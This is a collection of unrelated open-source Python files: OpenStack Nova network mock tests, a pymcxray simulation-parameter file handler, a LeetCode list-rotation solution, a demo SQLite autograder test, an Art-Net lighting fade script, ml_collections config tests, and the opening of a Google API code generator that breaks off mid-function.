AndReturn({'networks': [self.fip_pool_nova]})
self.moxed_client.create_floatingip(
{'floatingip': {'floating_network_id': pool_id}}).\
AndReturn({'floatingip': self.fip_unassociated})
self.mox.ReplayAll()
fip = api.allocate_floating_ip(self.context)
self.assertEqual(fip, self.fip_unassociated['floating_ip_address'])
def test_release_floating_ip(self):
api = quantumapi.API()
address = self.fip_unassociated['floating_ip_address']
fip_id = self.fip_unassociated['id']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_unassociated]})
self.moxed_client.delete_floatingip(fip_id)
self.mox.ReplayAll()
api.release_floating_ip(self.context, address)
def test_release_floating_ip_associated(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fip_id = self.fip_associated['id']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_associated]})
self.mox.ReplayAll()
self.assertRaises(exception.FloatingIpAssociated,
api.release_floating_ip, self.context, address)
def _setup_mock_for_refresh_cache(self, api):
nw_info = self.mox.CreateMock(model.NetworkInfo)
nw_info.json()
self.mox.StubOutWithMock(api, '_get_instance_nw_info')
api._get_instance_nw_info(mox.IgnoreArg(), self.instance).\
AndReturn(nw_info)
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(mox.IgnoreArg(),
self.instance['uuid'],
mox.IgnoreArg())
def test_associate_floating_ip(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fixed_address = self.fip_associated['fixed_ip_address']
fip_id = self.fip_associated['id']
search_opts = {'device_owner': 'compute:nova',
'device_id': self.instance['uuid']}
self.moxed_client.list_ports(**search_opts).\
AndReturn({'ports': [self.port_data2[1]]})
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_associated]})
self.moxed_client.update_floatingip(
fip_id, {'floatingip': {'port_id': self.fip_associated['port_id'],
'fixed_ip_address': fixed_address}})
self._setup_mock_for_refresh_cache(api)
self.mox.ReplayAll()
api.associate_floating_ip(self.context, self.instance,
address, fixed_address)
def test_associate_floating_ip_not_found_fixed_ip(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fixed_address = self.fip_associated['fixed_ip_address']
fip_id = self.fip_associated['id']
search_opts = {'device_owner': 'compute:nova',
'device_id': self.instance['uuid']}
self.moxed_client.list_ports(**search_opts).\
AndReturn({'ports': [self.port_data2[0]]})
self.mox.ReplayAll()
self.assertRaises(exception.FixedIpNotFoundForAddress,
api.associate_floating_ip, self.context,
self.instance, address, fixed_address)
def test_disassociate_floating_ip(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fip_id = self.fip_associated['id']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_associated]})
self.moxed_client.update_floatingip(
fip_id, {'floatingip': {'port_id': None}})
self._setup_mock_for_refresh_cache(api)
self.mox.ReplayAll()
api.disassociate_floating_ip(self.context, self.instance, address)
def test_add_fixed_ip_to_instance(self):
api = quantumapi.API()
self._setup_mock_for_refresh_cache(api)
network_id = 'my_netid1'
search_opts = {'network_id': network_id}
self.moxed_client.list_subnets(
**search_opts).AndReturn({'subnets': self.subnet_data_n})
zone = 'compute:%s' % self.instance['availability_zone']
search_opts = {'device_id': self.instance['uuid'],
'device_owner': 'compute:nova',
'network_id': network_id}
self.moxed_client.list_ports(
**search_opts).AndReturn({'ports': self.port_data1})
port_req_body = {
'port': {
'fixed_ips': [{'subnet_id': 'my_subid1'},
{'subnet_id': 'my_subid1'}],
},
}
port = self.port_data1[0]
port['fixed_ips'] = [{'subnet_id': 'my_subid1'}]
self.moxed_client.update_port('my_portid1',
MyComparator(port_req_body)).AndReturn({'port': port})
self.mox.ReplayAll()
api.add_fixed_ip_to_instance(self.context, self.instance, network_id)
def test_remove_fixed_ip_from_instance(self):
api = quantumapi.API()
self._setup_mock_for_refresh_cache(api)
address = '10.0.0.3'
zone = 'compute:%s' % self.instance['availability_zone']
search_opts = {'device_id': self.instance['uuid'],
'device_owner': zone,
'fixed_ips': 'ip_address=%s' % address}
self.moxed_client.list_ports(
**search_opts).AndReturn({'ports': self.port_data1})
port_req_body = {
'port': {
'fixed_ips': [],
},
}
port = self.port_data1[0]
port['fixed_ips'] = []
self.moxed_client.update_port('my_portid1',
MyComparator(port_req_body)).AndReturn({'port': port})
self.mox.ReplayAll()
api.remove_fixed_ip_from_instance(self.context, self.instance, address)
def test_list_floating_ips_without_l3_support(self):
api = quantumapi.API()
QuantumNotFound = quantumv2.exceptions.QuantumClientException(
status_code=404)
self.moxed_client.list_floatingips(
fixed_ip_address='1.1.1.1', port_id=1).AndRaise(QuantumNotFound)
self.mox.ReplayAll()
quantumv2.get_client('fake')
floatingips = api._get_floating_ips_by_fixed_and_port(
self.moxed_client, '1.1.1.1', 1)
self.assertEqual(floatingips, [])
class TestQuantumv2ModuleMethods(test.TestCase):
def test_ensure_requested_network_ordering_no_preference_ids(self):
l = [1, 2, 3]
quantumapi._ensure_requested_network_ordering(
lambda x: x,
l,
None)
def test_ensure_requested_network_ordering_no_preference_hashes(self):
l = [{'id': 3}, {'id': 1}, {'id': 2}]
quantumapi._ensure_requested_network_ordering(
lambda x: x['id'],
l,
None)
self.assertEqual(l, [{'id': 3}, {'id': 1}, {'id': 2}])
def test_ensure_requested_network_ordering_with_preference(self):
l = [{'id': 3}, {'id': 1}, {'id': 2}]
quantumapi._ensure_requested_network_ordering(
lambda x: x['id'],
l,
[1, 2, 3])
self.assertEqual(l, [{'id': 1}, {'id': 2}, {'id': 3}])
| zestrada/nova-cs498cc | nova/tests/network/test_quantumv2.py | Python | apache-2.0 | 55,258 |
#!/usr/bin/env python
"""
.. py:currentmodule:: FileFormat.SimulationParameters
.. moduleauthor:: Hendrix Demers <[email protected]>
MCXRay simulation parameters input file.
"""
# Script information for the file.
__author__ = "Hendrix Demers ([email protected])"
__version__ = ""
__date__ = ""
__copyright__ = "Copyright (c) 2012 Hendrix Demers"
__license__ = ""
# Subversion information for the file.
__svnRevision__ = "$Revision$"
__svnDate__ = "$Date$"
__svnId__ = "$Id$"
# Standard library modules.
import copy
# Third party modules.
# Local modules.
# Project modules
import pymcxray.FileFormat.MCXRayModel as MCXRayModel
import pymcxray.FileFormat.Version as Version
# Globals and constants variables.
KEY_BASE_FILENAME = "BaseFileName"
KEY_NUMBER_ELECTRONS = "ElectronNbr"
KEY_NUMBER_PHOTONS = "PhotonNbr"
KEY_NUMBER_WINDOWS = "WindowNbr"
KEY_NUMBER_FILMS_X = "FilmNbrX"
KEY_NUMBER_FILMS_Y = "FilmNbrY"
KEY_NUMBER_FILMS_Z = "FilmNbrZ"
KEY_NUMBER_CHANNELS = "SpectraChannel"
KEY_ENERGY_CHANNEL_WIDTH = "EnergyChannelWidth"
KEY_SPECTRA_INTERPOLATION_MODEL = "SpectraInterpolation"
KEY_VOXEL_SIMPLIFICATION = "VoxelSimplification"
KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR = "ElasticCrossSectionScalingFactor"
KEY_ENERGY_LOSS_SCALING_FACTOR = "EnergyLossScalingFactor"
class SimulationParameters(object):
def __init__(self):
self.version = copy.deepcopy(Version.CURRENT_VERSION)
self._keys = self._createKeys()
self._parameters = {}
self.defaultValues()
def _createKeys(self):
keys = []
keys.append(KEY_BASE_FILENAME)
keys.append(KEY_NUMBER_ELECTRONS)
keys.append(KEY_NUMBER_PHOTONS)
keys.append(KEY_NUMBER_WINDOWS)
keys.append(KEY_NUMBER_FILMS_X)
keys.append(KEY_NUMBER_FILMS_Y)
keys.append(KEY_NUMBER_FILMS_Z)
if self.version == Version.BEFORE_VERSION:
keys.append(KEY_NUMBER_CHANNELS)
else:
keys.append(KEY_ENERGY_CHANNEL_WIDTH)
keys.append(KEY_SPECTRA_INTERPOLATION_MODEL)
keys.append(KEY_VOXEL_SIMPLIFICATION)
if self.version >= Version.VERSION_1_4_4:
keys.append(KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR)
keys.append(KEY_ENERGY_LOSS_SCALING_FACTOR)
return keys
def defaultValues(self):
baseFilenameRef = r"Results\McXRay"
self.baseFilename = baseFilenameRef
self.numberElectrons = 1000
self.numberPhotons = 10000
self.numberWindows = 64
self.numberFilmsX = 128
self.numberFilmsY = 128
self.numberFilmsZ = 128
self.numberChannels = 1024
self.energyChannelWidth_eV = 5.0
self.spectrumInterpolationModel = MCXRayModel.SpectrumInterpolationModel.TYPE_LINEAR_DOUBLE
self.voxelSimplification = None
self.elasticCrossSectionScalingFactor = 1.0
self.energyLossScalingFactor = 1.0
def _createExtractMethod(self):
extractMethods = {}
extractMethods[KEY_BASE_FILENAME] = str
extractMethods[KEY_NUMBER_ELECTRONS] = int
extractMethods[KEY_NUMBER_PHOTONS] = int
extractMethods[KEY_NUMBER_WINDOWS] = int
extractMethods[KEY_NUMBER_FILMS_X] = int
extractMethods[KEY_NUMBER_FILMS_Y] = int
extractMethods[KEY_NUMBER_FILMS_Z] = int
extractMethods[KEY_NUMBER_CHANNELS] = int
extractMethods[KEY_ENERGY_CHANNEL_WIDTH] = float
extractMethods[KEY_SPECTRA_INTERPOLATION_MODEL] = self._extractSpectrumInterpolationModel
extractMethods[KEY_VOXEL_SIMPLIFICATION] = bool
extractMethods[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR] = float
extractMethods[KEY_ENERGY_LOSS_SCALING_FACTOR] = float
return extractMethods
def _createFormatMethod(self):
        formatMethods = {}
        formatMethods[KEY_BASE_FILENAME] = "%s"
        formatMethods[KEY_NUMBER_ELECTRONS] = "%i"
        formatMethods[KEY_NUMBER_PHOTONS] = "%i"
        formatMethods[KEY_NUMBER_WINDOWS] = "%i"
        formatMethods[KEY_NUMBER_FILMS_X] = "%i"
        formatMethods[KEY_NUMBER_FILMS_Y] = "%i"
        formatMethods[KEY_NUMBER_FILMS_Z] = "%i"
        formatMethods[KEY_NUMBER_CHANNELS] = "%i"
        formatMethods[KEY_ENERGY_CHANNEL_WIDTH] = "%s"
        formatMethods[KEY_SPECTRA_INTERPOLATION_MODEL] = "%s"
        formatMethods[KEY_VOXEL_SIMPLIFICATION] = "%s"
        formatMethods[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR] = "%.5f"
        formatMethods[KEY_ENERGY_LOSS_SCALING_FACTOR] = "%.5f"
        return formatMethods
def _extractSpectrumInterpolationModel(self, text):
model = MCXRayModel.SpectrumInterpolationModel(int(text))
return model
def read(self, filepath):
self.version.readFromFile(filepath)
        with open(filepath, 'r') as inputFile:
            lines = inputFile.readlines()
extractMethods = self._createExtractMethod()
for line in lines:
line = line.strip()
for key in self._keys:
if line.startswith(key):
items = line.split('=')
self._parameters[key] = extractMethods[key](items[-1])
    def write(self, filepath):
        with open(filepath, 'w') as outputFile:
            self._writeHeader(outputFile)
            self.version.writeLine(outputFile)
            formatMethods = self._createFormatMethod()
            keys = self._createKeys()
            for key in keys:
                if key == KEY_SPECTRA_INTERPOLATION_MODEL:
                    value = formatMethods[key] % (self._parameters[key].getModel())
                else:
                    value = formatMethods[key] % (self._parameters[key])
                if value is not None and value != "None":
                    line = "%s=%s\n" % (key, value)
                    outputFile.write(line)
def _writeHeader(self, outputFile):
if self._parameters[KEY_VOXEL_SIMPLIFICATION] is not None:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in PhiRo computations",
"*** FilmNbrX = Number of X layers in PhiRo computations",
"*** FilmNbrY = Number of Y layers in PhiRo computations",
"*** FilmNbrZ = Number of Z layers in PhiRo computations",
"*** SpectraChannel = Number of channels in spectraa",
"*** SpectraInterpolation = Interpolation type for spectras",
"*** VoxelSimplification = Use only middle voxel of trajectories to store energy",
"***",
"********************************************************************************"]
elif self.version == Version.BEFORE_VERSION:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in PhiRo computations",
"*** FilmNbrX = Number of X layers in PhiRo computations",
"*** FilmNbrY = Number of Y layers in PhiRo computations",
"*** FilmNbrZ = Number of Z layers in PhiRo computations",
"*** SpectraChannel = Number of channels in spectraa",
"*** SpectraInterpolation = Interpolation type for spectras",
"***",
"********************************************************************************"]
elif self.version >= Version.VERSION_1_4_4:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in Spectrum computations",
"*** FilmNbrX = Number of X layers in Spectrum computations",
"*** FilmNbrY = Number of Y layers in Spectrum computations",
"*** FilmNbrZ = Number of Z layers in Spectrum computations",
"*** EnergyChannelWidth in eV",
"*** SpectraInterpolation = Interpolation type for spectra",
"*** ElasticCrossSectionScalingFactor",
"*** EnergyLossScalingFactor",
"***",
"********************************************************************************"]
else:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in Spectrum computations",
"*** FilmNbrX = Number of X layers in Spectrum computations",
"*** FilmNbrY = Number of Y layers in Spectrum computations",
"*** FilmNbrZ = Number of Z layers in Spectrum computations",
"*** EnergyChannelWidth in eV",
"*** SpectraInterpolation = Interpolation type for spectra",
"***",
"********************************************************************************"]
for line in headerLines:
outputFile.write(line+'\n')
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def baseFilename(self):
return self._parameters[KEY_BASE_FILENAME]
@baseFilename.setter
def baseFilename(self, baseFilename):
self._parameters[KEY_BASE_FILENAME] = baseFilename
@property
def numberElectrons(self):
return self._parameters[KEY_NUMBER_ELECTRONS]
@numberElectrons.setter
def numberElectrons(self, numberElectrons):
self._parameters[KEY_NUMBER_ELECTRONS] = numberElectrons
@property
def numberPhotons(self):
return self._parameters[KEY_NUMBER_PHOTONS]
@numberPhotons.setter
def numberPhotons(self, numberPhotons):
self._parameters[KEY_NUMBER_PHOTONS] = numberPhotons
@property
def numberWindows(self):
return self._parameters[KEY_NUMBER_WINDOWS]
@numberWindows.setter
def numberWindows(self, numberWindows):
self._parameters[KEY_NUMBER_WINDOWS] = numberWindows
@property
def numberFilmsX(self):
return self._parameters[KEY_NUMBER_FILMS_X]
@numberFilmsX.setter
def numberFilmsX(self, numberFilmsX):
self._parameters[KEY_NUMBER_FILMS_X] = numberFilmsX
@property
def numberFilmsY(self):
return self._parameters[KEY_NUMBER_FILMS_Y]
@numberFilmsY.setter
def numberFilmsY(self, numberFilmsY):
self._parameters[KEY_NUMBER_FILMS_Y] = numberFilmsY
@property
def numberFilmsZ(self):
return self._parameters[KEY_NUMBER_FILMS_Z]
@numberFilmsZ.setter
def numberFilmsZ(self, numberFilmsZ):
self._parameters[KEY_NUMBER_FILMS_Z] = numberFilmsZ
@property
def numberChannels(self):
return self._parameters[KEY_NUMBER_CHANNELS]
@numberChannels.setter
def numberChannels(self, numberChannels):
self._parameters[KEY_NUMBER_CHANNELS] = numberChannels
@property
def energyChannelWidth_eV(self):
return self._parameters[KEY_ENERGY_CHANNEL_WIDTH]
@energyChannelWidth_eV.setter
def energyChannelWidth_eV(self, energyChannelWidth_eV):
self._parameters[KEY_ENERGY_CHANNEL_WIDTH] = energyChannelWidth_eV
@property
def spectrumInterpolationModel(self):
return self._parameters[KEY_SPECTRA_INTERPOLATION_MODEL].getModel()
@spectrumInterpolationModel.setter
def spectrumInterpolationModel(self, spectrumInterpolationModel):
self._parameters[KEY_SPECTRA_INTERPOLATION_MODEL] = MCXRayModel.SpectrumInterpolationModel(spectrumInterpolationModel)
@property
def voxelSimplification(self):
return self._parameters.get(KEY_VOXEL_SIMPLIFICATION, None)
@voxelSimplification.setter
def voxelSimplification(self, voxelSimplification):
self._parameters[KEY_VOXEL_SIMPLIFICATION] = voxelSimplification
@property
def elasticCrossSectionScalingFactor(self):
return self._parameters[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR]
@elasticCrossSectionScalingFactor.setter
def elasticCrossSectionScalingFactor(self, elasticCrossSectionScalingFactor):
self._parameters[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR] = elasticCrossSectionScalingFactor
@property
def energyLossScalingFactor(self):
return self._parameters[KEY_ENERGY_LOSS_SCALING_FACTOR]
@energyLossScalingFactor.setter
def energyLossScalingFactor(self, energyLossScalingFactor):
self._parameters[KEY_ENERGY_LOSS_SCALING_FACTOR] = energyLossScalingFactor
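# --- Usage sketch (illustrative, not part of the original module) ---
# A minimal example of how this class is typically driven: build the default
# parameters, adjust a few values through the properties, write them to an
# MCXRay input file, and read them back. The file and base names used here are
# only assumptions for demonstration purposes.
if __name__ == '__main__':
    simulationParameters = SimulationParameters()
    simulationParameters.baseFilename = r"Results\Example"
    simulationParameters.numberElectrons = 5000
    simulationParameters.energyChannelWidth_eV = 10.0
    simulationParameters.write("SimulationParametersExample.txt")
    # Reading the file back repopulates the internal parameter dictionary.
    readParameters = SimulationParameters()
    readParameters.read("SimulationParametersExample.txt")
    print(readParameters.numberElectrons)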
| drix00/pymcxray | pymcxray/FileFormat/SimulationParameters.py | Python | apache-2.0 | 15,335 |
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
if not head: return None
p = head
listLen = 0 # calculate list length
while p:
p = p.next
listLen += 1
k = k % listLen # now k < listLen
if k == 0:
return head
        # Two-pointer approach: advance p2 k nodes ahead of p1, then move both
        # until p2 reaches the tail; p1 then stops at the node just before the
        # new head.
        p1 = head; p2 = head
        for _ in xrange(k):
            p2 = p2.next
        assert p2
        while p2.next:
            p1 = p1.next
            p2 = p2.next
        newHead = p1.next
        p1.next = None  # cut the list after p1
        p2.next = head  # splice the old head after the old tail
        return newHead
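# Worked example (illustrative): rotating 1->2->3->4->5 by k=2 yields
# 4->5->1->2->3, which is what the quick check below should print, assuming
# the helpers in utils build and print linked lists as their names suggest.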
from utils import *
printlist(Solution().rotateRight(makelist(1, 2, 3, 4, 5), 2)) | xiaonanln/myleetcode-python | src/61. Rotate List.py | Python | apache-2.0 | 732 |
test = {
'name': 'Question 2',
'points': 2,
'suites': [
{
'type': 'sqlite',
'setup': r"""
sqlite> .open hw1.db
""",
'cases': [
{
'code': r"""
sqlite> select * from colors;
red|primary
blue|primary
green|secondary
yellow|primary
""",
},
{
'code': r"""
sqlite> select color from colors;
red
blue
green
yellow
""",
},
],
}
]
}
| jackzhao-mj/ok-client | demo/sqlite/tests/q2.py | Python | apache-2.0 | 548 |
import time, logging
from artnet import dmx, fixtures, rig
from artnet.dmx import fades
log = logging.getLogger(__name__)
# set up test fixtures
r = rig.get_default_rig()
g = r.groups['all']
def all_red():
"""
Create an all-red frame.
"""
g.setColor('#ff0000')
g.setIntensity(255)
return g.getFrame()
def all_blue():
"""
Create an all-blue frame.
"""
g.setColor('#0000ff')
g.setIntensity(255)
return g.getFrame()
def main(config, controller=None):
log.info("Running script %s" % __name__)
# global g
# g = get_default_fixture_group(config)
q = controller or dmx.Controller(config.get('base', 'address'), bpm=60, nodaemon=True, runout=True)
q.add(fades.create_multifade([
all_red(),
all_blue(),
] * 3, secs=5.0))
if not controller:
q.start()
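# Illustrative variation (assumption, not part of the original script): the
# same multifade helper accepts any sequence of frames, so a faster red/blue
# chase could be queued with:
#   q.add(fades.create_multifade([all_red(), all_blue()] * 6, secs=2.0))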
| ScienceWorldCA/domelights | backend/artnet-bridge/artnet/scripts/alternating_color_fades.py | Python | apache-2.0 | 776 |
# Copyright 2022 The ML Collections Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for config_path."""
from absl.testing import absltest
from absl.testing import parameterized
from ml_collections.config_flags import config_path
from ml_collections.config_flags.tests import fieldreference_config
from ml_collections.config_flags.tests import mock_config
class ConfigPathTest(parameterized.TestCase):
def test_list_extra_index(self):
"""Tries to index a non-indexable list element."""
test_config = mock_config.get_config()
with self.assertRaises(IndexError):
config_path.get_value('dict.list[0][0]', test_config)
def test_list_out_of_range_get(self):
"""Tries to access out-of-range value in list."""
test_config = mock_config.get_config()
with self.assertRaises(IndexError):
config_path.get_value('dict.list[2][1]', test_config)
def test_list_out_of_range_set(self):
"""Tries to override out-of-range value in list."""
test_config = mock_config.get_config()
with self.assertRaises(IndexError):
config_path.set_value('dict.list[2][1]', test_config, -1)
def test_reading_non_existing_key(self):
"""Tests reading non existing key from config."""
test_config = mock_config.get_config()
with self.assertRaises(KeyError):
config_path.set_value('dict.not_existing_key', test_config, 1)
def test_reading_setting_existing_key_in_dict(self):
"""Tests setting non existing key from dict inside config."""
test_config = mock_config.get_config()
with self.assertRaises(KeyError):
config_path.set_value('dict.not_existing_key.key', test_config, 1)
def test_empty_key(self):
"""Tests calling an empty key update."""
test_config = mock_config.get_config()
with self.assertRaises(ValueError):
config_path.set_value('', test_config, None)
def test_field_reference_types(self):
"""Tests whether types of FieldReference fields are valid."""
test_config = fieldreference_config.get_config()
paths = ['ref_nodefault', 'ref']
paths_types = [int, int]
config_types = [config_path.get_type(path, test_config) for path in paths]
self.assertEqual(paths_types, config_types)
@parameterized.parameters(
('float', float),
('integer', int),
('string', str),
('bool', bool),
('dict', dict),
('dict.float', float),
('dict.list', list),
('list', list),
('list[0]', int),
('object.float', float),
('object.integer', int),
('object.string', str),
('object.bool', bool),
('object.dict', dict),
('object.dict.float', float),
('object.dict.list', list),
('object.list', list),
('object.list[0]', int),
('object.tuple', tuple),
('object_reference.float', float),
('object_reference.integer', int),
('object_reference.string', str),
('object_reference.bool', bool),
('object_reference.dict', dict),
('object_reference.dict.float', float),
('object_copy.float', float),
('object_copy.integer', int),
('object_copy.string', str),
('object_copy.bool', bool),
('object_copy.dict', dict),
('object_copy.dict.float', float),
)
def test_types(self, path, path_type):
"""Tests whether various types of objects are valid."""
test_config = mock_config.get_config()
self.assertEqual(path_type, config_path.get_type(path, test_config))
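  # Illustrative addition (not part of the original suite): a simple round
  # trip through set_value/get_value on a field that mock_config is known to
  # define, based on the paths exercised in test_types above.
  def test_set_then_get_round_trip(self):
    """Sets an existing integer field and reads the same value back."""
    test_config = mock_config.get_config()
    config_path.set_value('integer', test_config, 42)
    self.assertEqual(42, config_path.get_value('integer', test_config))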
if __name__ == '__main__':
absltest.main()
| google/ml_collections | ml_collections/config_flags/tests/config_path_test.py | Python | apache-2.0 | 4,017 |
#!/usr/bin/python2.7
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Create an API definition by interpreting a discovery document.
This module interprets a discovery document to create a tree of classes which
represent the API structure in a way that is useful for generating a library.
For each discovery element (e.g. schemas, resources, methods, ...) there is
a class to represent it which is directly usable in the templates. The
instances of those classes are annotated with extra variables for use
in the template which are language specific.
The current way to make use of this class is to create a programming language
specific subclass of Api, which adds annotations and template variables
appropriate for that language.
TODO(user): Refactor this so that the API can be loaded first, then annotated.
"""
__author__ = '[email protected] (Tony Aiuto)'
import json
import logging
import operator
import urlparse
from googleapis.codegen import data_types
from googleapis.codegen import template_objects
from googleapis.codegen import utilities
from googleapis.codegen.api_exception import ApiException
from googleapis.codegen.schema import Schema
from googleapis.codegen.utilities import convert_size
_DEFAULT_SERVICE_HOST = 'www.googleapis.com'
_DEFAULT_OWNER_DOMAIN = 'google.com'
_DEFAULT_OWNER_NAME = 'Google'
_RECOGNIZED_GOOGLE_DOMAINS = (
'google.com',
'googleapis.com',
'googleplex.com'
)
# Recognized names of request and response fields used for paging.
_PAGE_TOKEN_NAMES = ('pageToken', 'nextPageToken')
_LOGGER = logging.getLogger('codegen')
class Api(template_objects.CodeObject):
"""An API definition.
This class holds a discovery centric definition of an API. It contains
members such as "resources" and "schemas" which relate directly to discovery
concepts. It defines several properties that can be used in code generation
templates:
name: The API name.
version: The API version.
versionNoDots: The API version with all '.' characters replaced with '_'.
This is typically used in class names.
versionNoDash: The API version with all '-' characters replaced with '_'.
This is typically used in file names where '-' has meaning.
authScopes: The list of the OAuth scopes used by this API.
dataWrapper: True if the API definition contains the 'dataWrapper' feature.
methods: The list of top level API methods.
models: The list of API data models, both from the schema section of
discovery and from anonymous objects defined in method definitions.
parameters: The list of global method parameters (applicable to all methods)
resources: The list of API resources
"""
def __init__(self, discovery_doc, language=None):
super(Api, self).__init__(discovery_doc, self,
wire_name=discovery_doc['name'])
name = self.values['name']
self._validator.ValidateApiName(name)
if name != 'freebase':
self._validator.ValidateApiVersion(self.values['version'])
canonical_name = self.values.get('canonicalName') or name
if not self.values.get('canonicalName'):
self.values['canonicalName'] = canonical_name
self._class_name = self.ToClassName(canonical_name, self)
# Guard against language implementor not taking care of spaces
self._class_name = self._class_name.replace(' ', '')
self._NormalizeOwnerInformation()
self._language = language
self._template_dir = None
self._surface_features = {}
self._schemas = {}
self._methods_by_name = {}
self._all_methods = []
self.SetTemplateValue('className', self._class_name)
self.SetTemplateValue('versionNoDots',
self.values['version'].replace('.', '_'))
self.SetTemplateValue('versionNoDash',
self.values['version'].replace('-', '_'))
self.SetTemplateValue('dataWrapper',
'dataWrapper' in discovery_doc.get('features', []))
self.values.setdefault('title', name)
self.values.setdefault('exponentialBackoffDefault', False)
if not self.values.get('revision'):
self.values['revision'] = 'snapshot'
self._NormalizeUrlComponents()
# Information for variant subtypes, a dictionary of the format:
#
# { 'wireName': {'discriminant': discriminant, 'value': value,
# 'schema': schema},
# ... }
#
# ... where wireName is the name of variant subtypes, discriminant
# the field name of the discriminant, value the discriminant value
# for this variant, and schema the base schema.
#
# This information cannot be stored in the referred schema at
# reading time because at the time we read it from the base
# schema, the referenced variant schemas may not yet be loaded. So
# we first store it here, and after all schemas have been loaded,
# update the schema template properties.
self._variant_info = {}
# Build data types and methods
self._SetupModules()
self.void_type = data_types.Void(self)
self._BuildSchemaDefinitions()
self._BuildResourceDefinitions()
self.SetTemplateValue('resources', self._resources)
# Make data models part of the api dictionary
self.SetTemplateValue('models', self.ModelClasses())
# Replace methods dict with Methods
self._top_level_methods = []
method_dict = self.values.get('methods') or {}
for name in sorted(method_dict):
self._top_level_methods.append(Method(self, name, method_dict[name]))
self.SetTemplateValue('methods', self._top_level_methods)
# Global parameters
self._parameters = []
param_dict = self.values.get('parameters') or {}
for name in sorted(param_dict):
parameter = Parameter(self, name, param_dict[name], self)
self._parameters.append(parameter)
if name == 'alt':
self.SetTemplateValue('alt', parameter)
self.SetTemplateValue('parameters', self._parameters)
# Auth scopes
self._authscopes = []
if (self.values.get('auth') and
self.values['auth'].get('oauth2') and
self.values['auth']['oauth2'].get('scopes')):
for value, auth_dict in sorted(
self.values['auth']['oauth2']['scopes'].iteritems()):
self._authscopes.append(AuthScope(self, value, auth_dict))
self.SetTemplateValue('authscopes', self._authscopes)
@property
def all_schemas(self):
"""The dictionary of all the schema objects found in the API."""
return self._schemas
def _SetupModules(self):
"""Compute and set the module(s) which this API belongs under."""
# The containing module is based on the owner information.
path = self.values.get('modulePath') or self.values.get('packagePath')
self._containing_module = template_objects.Module(
package_path=path,
owner_name=self.values.get('owner'),
owner_domain=self.values.get('ownerDomain'))
self.SetTemplateValue('containingModule', self._containing_module)
# The API is a child of the containing_module
base = self.values['name']
# TODO(user): Introduce a breaking change where we always prefer
# canonicalName.
if self.values.get('packagePath'):
# Lowercase the canonical name only for non-cloud-endpoints Google APIs.
# This is to avoid breaking changes to existing Google-owned Cloud
# Endpoints APIs.
if self.values.get('rootUrl').find('.googleapis.com') > 0:
base = self.values.get('canonicalName').lower() or base
else:
base = self.values.get('canonicalName') or base
if self.values.get('version_module'):
base = '%s/%s' % (base, self.values['versionNoDots'])
self._module = template_objects.Module(package_path=base,
parent=self._containing_module)
self.SetTemplateValue('module', self._module)
# The default module for data models defined by this API.
self._model_module = template_objects.Module(package_path=None,
parent=self._module)
def _BuildResourceDefinitions(self):
"""Loop over the resources in the discovery doc and build definitions."""
self._resources = []
def_dict = self.values.get('resources') or {}
for name in sorted(def_dict):
resource = Resource(self, name, def_dict[name], parent=self)
self._resources.append(resource)
def _BuildSchemaDefinitions(self):
"""Loop over the schemas in the discovery doc and build definitions."""
schemas = self.values.get('schemas')
if schemas:
for name in sorted(schemas):
def_dict = schemas[name]
# Upgrade the string format schema to a dict.
if isinstance(def_dict, unicode):
def_dict = json.loads(def_dict)
self._schemas[name] = self.DataTypeFromJson(def_dict, name)
# Late bind info for variant types, and mark the discriminant
# field and value.
for name, info in self._variant_info.iteritems():
if name not in self._schemas:
# The error will be reported elsewhere
continue
schema = self._schemas[name]
for prop in schema.values.get('properties'):
